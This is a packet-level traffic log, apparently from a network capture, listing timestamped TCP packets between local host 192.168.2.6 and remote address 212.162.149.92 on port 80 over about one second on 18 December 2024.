                                                            Dec 18, 2024 11:05:13.873259068 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.944792032 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.944835901 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.944854975 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.944890022 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.947182894 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.947228909 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.947328091 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.947365046 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.952148914 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.952199936 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.952224016 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.952260971 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.957053900 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.957099915 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.957343102 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.957380056 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.962265015 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.962284088 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.962318897 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.962341070 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.966689110 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.966744900 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.966795921 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.966830015 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.971329927 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.971373081 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.971417904 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.971455097 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.976147890 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.976207018 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.976242065 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.976280928 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.980771065 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.980833054 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.980876923 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.980959892 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.985467911 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.985551119 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.987601042 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.987646103 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.987715006 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.987757921 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.992295027 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.992346048 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.992425919 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.992465019 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.997029066 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.997092009 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.997149944 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.997226954 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.001728058 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.001790047 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.001837015 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.001876116 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.006477118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.006527901 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.006573915 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.006609917 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.010302067 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.010349989 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.010449886 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.010490894 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.014045954 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.014097929 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.014148951 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.014189959 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.017831087 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.017884970 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.017962933 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.018004894 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.021635056 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.021687031 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.021712065 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.021749020 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.025475025 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.025531054 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.025535107 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.025579929 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.029526949 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.029566050 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.029580116 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.029603004 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.033097029 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.033154011 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.033181906 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.033231974 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.065093040 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.065145016 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.065318108 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.066941977 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.067011118 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.136131048 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.136157990 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.136781931 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.137485981 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.137578964 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.137782097 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.140481949 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.140563011 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.140588045 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.142752886 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.257066965 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.257119894 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.257210016 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.257210016 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.259958029 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.259977102 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.260108948 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.376756907 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.376785040 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.377028942 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.379488945 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.379525900 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.379662991 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496259928 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496289015 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496303082 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496315956 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496328115 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496340036 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496352911 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496360064 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496357918 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496366024 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496357918 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496371984 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496377945 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496465921 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496522903 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496568918 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496582985 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496654987 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496654987 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496766090 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496778011 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496789932 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496802092 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496815920 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496840000 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496851921 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496865034 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496886015 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496887922 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496900082 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496912003 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496926069 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496926069 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496965885 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496965885 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.497544050 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497555971 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497566938 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497687101 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.497709036 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497735977 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497802973 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.497884035 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497895956 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497908115 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497920036 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497926950 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497932911 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497939110 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497946024 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497956038 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497967958 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498002052 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498002052 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498519897 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498650074 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498661995 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498684883 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498687983 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498699903 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498712063 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498723984 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498723984 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498723984 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498745918 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498749971 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498763084 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498783112 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498784065 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498826981 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498943090 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499475956 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499490023 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499500036 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499521971 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499535084 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499547005 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499547958 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499562979 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499593973 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499594927 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499658108 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499939919 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499953985 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499985933 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500010014 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500019073 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500019073 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500021935 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500035048 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500049114 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500047922 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500049114 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500061989 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500077009 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500077009 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500340939 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500961065 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500971079 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500983953 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500996113 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501010895 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501023054 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501030922 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501054049 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501231909 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501780987 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501794100 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501804113 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501816034 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501827955 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501841068 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501852989 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501864910 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501876116 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501877069 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501876116 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501889944 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501904011 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501904011 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501916885 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501951933 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.502002001 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.502671957 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502684116 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502693892 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502707005 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502720118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502739906 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.502861977 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.503523111 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.503544092 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.503556013 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.503568888 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.503607988 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.503880978 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.504373074 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504386902 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504487991 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504499912 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504520893 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.504522085 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504535913 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504561901 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.504630089 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.505141973 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505161047 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505172968 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505184889 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505203962 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505218029 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505220890 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.505233049 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505244970 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505266905 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.505266905 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.505301952 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.518517017 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.518583059 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.616110086 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.616213083 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.616242886 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.616343021 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.617131948 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.617192984 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.617237091 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.617259979 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.619343996 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.619425058 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.619456053 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.621292114 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.621325016 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.621371031 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.621537924 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.623016119 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.623102903 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.623131990 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.623254061 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.624593019 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.624661922 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.626394987 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.626421928 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.626457930 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.627346992 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.628264904 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.628329992 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.628365993 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.628422022 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.630229950 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.630286932 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.630409002 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.630676031 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.632139921 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.632252932 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.632989883 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.633052111 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.633162975 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.633219957 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.634932041 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.635000944 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.635035992 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.635093927 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.636653900 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.636728048 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.636765003 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.636826038 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.638508081 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.638582945 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.638608932 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.638669014 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.640422106 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.640512943 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.640551090 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.642216921 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.642246962 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.642286062 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.642694950 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.644084930 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.644156933 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.644166946 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.644258976 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.645951033 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.646024942 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.647835970 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.647864103 CET4986880192.168.2.6212.162.149.92
